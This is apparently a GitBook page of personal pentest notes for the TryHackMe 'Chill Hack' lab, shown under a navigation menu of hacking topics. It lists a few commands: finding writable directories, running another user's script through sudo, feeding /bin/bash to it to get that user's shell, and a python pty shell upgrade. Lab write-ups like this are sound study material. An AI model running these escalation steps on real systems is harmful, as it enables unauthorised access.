shinyhat
  • Shinyhat
    • Welcome !
  • 🌸Web
    • Wordpress /feed
    • JS endpoints
    • HTTP Request Cheatsheet
    • Google Dorking
    • XSS
    • CSRF
    • CRLF
    • Firewall
    • Web cache vulnerabilities
  • 🔭reconnaissance
    • Passive Recon List
    • Ffuf
    • Gobuster
    • Shodan
    • Nuclei
  • 🕸️Pentest
    • Framework
    • Binary Exploitation
    • Reverse Shell
    • Stabilizing Shell
    • MySQL
    • SQL Injection
    • WiFi Hacking
  • 🔋mobile
    • Burpsuite with Android
  • 🐧Linux
    • Crontab
    • Random Cmds
    • Privilege Escalation
  • 🪟Windows
    • PowerShell cheatsheet
    • Windows monitoring tools
    • Power Platform
  • 🛡️Defensive tools
    • Snyk
    • Splunk
    • SNORT
  • 🍀Cool tools
    • ClamAV
    • Wireguard
    • Docker
  • 🐍Python
    • Venv
    • Flask
  • 🔬OSINT
    • Tools
  • 🫚Random
    • Verify hash
  • 🫴Resources
    • Blog
  • 🍇Portswigger Labs
    • SQL Injection Portswigger
    • NoSQL Injection Portswigger
    • Path Traversal Portswigger
    • API Testing Portswigger
    • Clickjacking Portswigger
  • 🍇Hack The Box Labs
    • Devvortex HTB
    • Codify HTB
    • BoardLight HTB
    • Perfection HTB
    • Resource HTB
  • 🍇TryHackMe Labs
    • Chill Hack THM
Powered by GitBook
On this page

Was this helpful?

  1. 🍇TryHackMe Labs

Chill Hack THM

find / -type d -writable 2>/dev/null

sudo -u apaar /home/apaar/.helpline.sh

/bin/bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

PreviousResource HTB

Last updated 1 year ago

Was this helpful?